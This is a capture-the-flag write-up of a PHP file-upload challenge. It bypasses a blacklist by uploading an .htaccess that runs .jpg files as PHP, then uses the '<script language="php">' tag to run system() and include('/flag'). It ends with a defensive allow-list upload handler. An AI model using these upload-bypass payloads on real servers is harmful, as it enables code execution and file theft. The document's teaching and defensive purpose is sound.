Opening the challenge, there is just a single file upload point.


First, I uploaded an empty PNG file to test the waters. The response complained that the uploaded file type was too exposing; after changing it to jpeg things went back to normal, and it returned the file path, which could be accessed directly.

/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/100.png succesfully uploaded!

After changing the file extension to php, the response (the suffix may not contain "ph") was:

后缀名不能有ph!

This probably calls for the .htaccess configuration file again: upload an .htaccess that tells Apache to treat every .jpg file as PHP.

Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

AddType application/x-httpd-php .jpg

Response:

/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/.htaccess succesfully uploaded!

Note that although the upload folder name looks like a random value, every file uploaded within the same session lands in the same folder.

Upload:

Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<?


Response (roughly: "hey, don't try to fool me, that tag is obviously still PHP"):

诶,别蒙我啊,这标志明显还是php啊

The question mark is being filtered here, so the bypass is the HTML-tag form of the PHP open tag:

<script language="php">system('cat /f*');</script>

Upload the file:

Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<script language="php">system('cat /f*');</script>

Response:

/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/1.jpg succesfully uploaded!

Visiting the file shows that the dangerous function has been disabled:

Warning: system() has been disabled for security reasons in /var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/1.jpg on line 1

So here we simply include the file directly.

Upload:

Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<script language="php">include('/flag');</script>

Response:

/var/www/html/upload/edf5f3dd80e979848bb7f9eb670da2cd/1.jpg succesfully uploaded!

Accessing it gives the flag:

flag{afe87f04-9e03-436a-8727-d3499b7aa482}
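As an added defensive counterpart (example code, not the challenge's own handler), this PHP upload handler closes the three gaps the walkthrough relies on: a blacklist filter that lets .htaccess through, trust in the client's Content-Type, and PHP code hidden behind a .jpg name. UPLOAD_DIR is an assumed directory outside the web root.

```php
<?php
// Added example, not the challenge's code: an allow-list upload handler.
// Assumption: UPLOAD_DIR is outside the web root and never served as PHP.
declare(strict_types=1);

const UPLOAD_DIR = '/var/uploads';
const ALLOWED    = [                 // extension => magic bytes the file must start with
    'jpg' => "\xFF\xD8\xFF",
    'png' => "\x89PNG\r\n\x1a\n",
];

// Returns null when the upload is acceptable, otherwise the reason it was rejected.
function validateUpload(string $clientName, string $tmpPath): ?string
{
    // 1. Allow-list the extension. A "no ph in the suffix" blacklist says nothing
    //    about .htaccess, which is what made the AddType trick possible.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return 'extension not allowed';
    }
    // 2. Ignore the Content-Type header and check the real file header instead.
    $magic = ALLOWED[$ext];
    $head  = file_get_contents($tmpPath, false, null, 0, strlen($magic));
    if ($head !== $magic) {
        return 'file content does not match its extension';
    }
    // 3. Defence in depth: reject any PHP open tag, including the legacy
    //    <script language="php"> form that dodges a plain "?" filter.
    //    (Over-approximates: XMP metadata such as <?xpacket is rejected too.)
    $body = file_get_contents($tmpPath);
    if (preg_match('/<\?|<script[^>]*language\s*=\s*["\']?php/i', $body) === 1) {
        return 'embedded code detected';
    }
    return null;
}

// Stores a validated upload under a server-chosen name, so the client never
// controls the stored filename (no dotfiles, no second extension).
function storeUpload(string $clientName, string $tmpPath): string
{
    if (($reason = validateUpload($clientName, $tmpPath)) !== null) {
        throw new RuntimeException('upload rejected: ' . $reason);
    }
    $ext  = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmpPath, $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}
```

Pair this with `AllowOverride None` on the upload directory so that an uploaded .htaccess is ignored even if one ever lands there.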